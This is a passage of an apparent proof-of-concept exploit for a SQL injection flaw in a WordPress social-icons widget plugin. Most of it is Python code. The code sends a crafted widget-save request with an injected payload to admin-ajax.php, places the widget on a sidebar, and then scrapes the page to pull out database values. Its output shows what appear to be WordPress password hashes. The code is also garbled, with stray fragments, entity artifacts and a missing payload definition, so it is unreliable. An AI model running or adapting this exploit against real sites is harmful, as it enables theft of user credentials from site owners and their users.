The plugin does not sanitize the selected_icons attribute to the cnss_widget before using it in an SQL statement, leading to a SQL injection vulnerability.
id
IN({payload}) ORDER BY sortorder # We can escape Parenthesis. Then, trigger SQLi. widget_payload = f"widget-cnss_widget%5B{number_id}%5D%5Btitle%5D=Follow+Usf1" widget_payload += f"&widget-cnss;_widget%5B{number_id}%5D%5Bwidth%5D=32" widget_payload += f"&widget-cnss;_widget%5B{number_id}%5D%5Bheight%5D=32" widget_payload += f"&widget-cnss;_widget%5B{number_id}%5D%5Balignment%5D=center" widget_payload += f"&widget-cnss;_widget%5B{number_id}%5D%5Bdisplay%5D=horizontal" widget_payload += f"&widget-cnss;_widget%5B{number_id}%5D%5Bmargin%5D=4" widget_payload += f"&widget-cnss;_widget%5B{number_id}%5D%5Bselected_icons%5D%5B%5D={payload}" widget_payload += f"&widget-cnss;_widget%5B{number_id}%5D%5Battr_id%5D=" widget_payload += f"&widget-cnss;_widget%5B{number_id}%5D%5Battr_class%5D=" widget_payload += f"&widget-id;=cnss_widget-{number_id}" widget_payload += f"&id;_base=cnss_widget" widget_payload += f"&widget-width;=250" widget_payload += f"&widget-height;=200" widget_payload += f"&widget;_number={number_id - 1}" widget_payload += f"&multi;_number={number_id}" widget_payload += f"&add;_new=multi" widget_payload += f"&action;=save-widget" widget_payload += f"&savewidgets;={_nonce}" widget_payload += f"&sidebar;=right-sidebar" # Make a Widget res = sess.post( BASE_URL + “/wp-admin/admin-ajax.php”, headers = { “User-Agent” : “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36”, “Content-Type” : “application/x-www-form-urlencoded; charset=UTF-8” }, data = widget_payload, proxies = {“http” :“http://localhost:8080”} ) # setup : widget on the Sidebar res = sess.post( BASE_URL + “/wp-admin/admin-ajax.php”, data = f"action=widgets-order&savewidgets;={_nonce}&sidebars;%5Bwp_inactive_widgets%5D=&sidebars;%5Bright-sidebar%5D=widget-24_block-2%2Cwidget-25_block-3%2Cwidget-26_block-4%2Cwidget-27_block-5%2Cwidget-28_block-6%2Cwidget-1_cnss_widget-{number_id}&sidebars;%5Bfooter-sidebar-one%5D=&sidebars;%5Bfooter-sidebar-two%5D=&sidebars;%5Bfooter-sidebar-three%5D=“, headers = { “User-Agent” : “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36”, “Content-Type” : “application/x-www-form-urlencoded; charset=UTF-8” }, proxies = {“http” :“http://localhost:8080”} ) res = sess.get( BASE_URL ) bs = BeautifulSoup(res.text, “lxml”) for item in bs.find_all(“li”, {“class”: f"cn-fa-{title}”}) : print(item.a[‘href’].replace(“fa fa-”, “”)) ‘’’ [RESULT] $P$BohO2pBSHdTTXiCf7/I5ZjYkaTtqNQ1 $P$Bwoef3ORLrOFtqXxZs/pN7uQ6YoP5Z/ $P$B8dtGlBiT38lv2iJ7mSuwv5/hI/mz.0 ‘’’ sess = login(id, pw) exploit(sess)